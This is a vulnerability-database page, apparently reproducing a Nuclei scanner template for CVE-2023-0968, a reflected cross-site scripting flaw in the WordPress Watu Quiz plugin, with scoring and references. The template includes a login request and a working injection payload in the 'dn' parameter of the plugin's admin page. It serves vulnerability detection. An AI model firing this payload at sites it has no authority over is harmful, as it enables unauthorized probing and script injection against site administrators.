Lucene search
ProjectDiscoveryNUCLEI:CVE-2023-0968HistoryMar 31, 2023 - 11:28 a.m.
WordPress Watu Quiz <3.3.9.1 - Cross-Site Scripting
2023-03-3111:28:24
ProjectDiscovery
github.com
1
wordpress
watu quiz
cross-site scripting
vulnerability
injection
browser
attack
authentication
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
0.003 Low
EPSS
Percentile
66.0%
WordPress Watu Quiz plugin before 3.3.9.1 is susceptible to cross-site scripting. The plugin does not sanitize and escape some parameters, such as email, dn, date, and points, before outputting then back in a page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This exploit can be used against high-privilege users such as admin.
id: CVE-2023-0968
info:
name: WordPress Watu Quiz <3.3.9.1 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
WordPress Watu Quiz plugin before 3.3.9.1 is susceptible to cross-site scripting. The plugin does not sanitize and escape some parameters, such as email, dn, date, and points, before outputting then back in a page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This exploit can be used against high-privilege users such as admin.
impact: |
Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts on the victim's browser.
remediation: Fixed in version 3.3.9.1.
reference:
- https://wpscan.com/vulnerability/29008d1a-62b3-4f40-b5a3-134455b01595
- https://wordpress.org/plugins/watu/
- https://plugins.trac.wordpress.org/browser/watu/trunk/views/takings.php#L31
- https://nvd.nist.gov/vuln/detail/CVE-2023-0968
- https://www.wordfence.com/threat-intel/vulnerabilities/id/6341bdcc-c99f-40c3-81c4-ad90ff19f802
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-0968
cwe-id: CWE-79
epss-score: 0.00262
epss-percentile: 0.65937
cpe: cpe:2.3:a:kibokolabs:watu_quiz:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: kibokolabs
product: watu_quiz
framework: wordpress
tags: cve2023,cve,wordpress,wp,wp-plugin,xss,watu,authenticated,wpscan,kibokolabs
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=watu_takings&exam_id=1&dn="%2Fonmouseover%3Dalert(document.domain)%2F%2F HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(header_2, "text/html")'
- 'contains(body_2, "/onmouseover=alert(document.domain)//")'
- 'contains(body_2, "Watu Quizzes")'
condition: and
# digest: 4b0a004830460221008a17dec616c53559bea67a8cd4735a918b0217d5fd3ab3177fe5a9654a563107022100dc1d6eb7ac19aab44743cb8a942958603e5520ae7675897d1a3e156197cb02b8:922c64590222798bb761d5b6d8e72950Related
wpvulndb
wpvulndb
Watu Quiz < 3.3.9.1 - Reflected XSS
2023-03-03 00:00:00
wpexploit
wpexploit
Watu Quiz < 3.3.9.1 - Reflected XSS
2023-03-03 00:00:00
cve
cve
CVE-2023-0968
2023-03-03 22:15:09
cvelist
cvelist
CVE-2023-0968
2023-03-03 21:29:17
prion
prion
Cross site scripting
2023-03-03 22:15:00
nvd
nvd
CVE-2023-0968
2023-03-03 22:15:09
wordfence
wordfence
zdt
zdt
packetstorm
packetstorm
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
0.003 Low
EPSS
Percentile
66.0%
Related for NUCLEI:CVE-2023-0968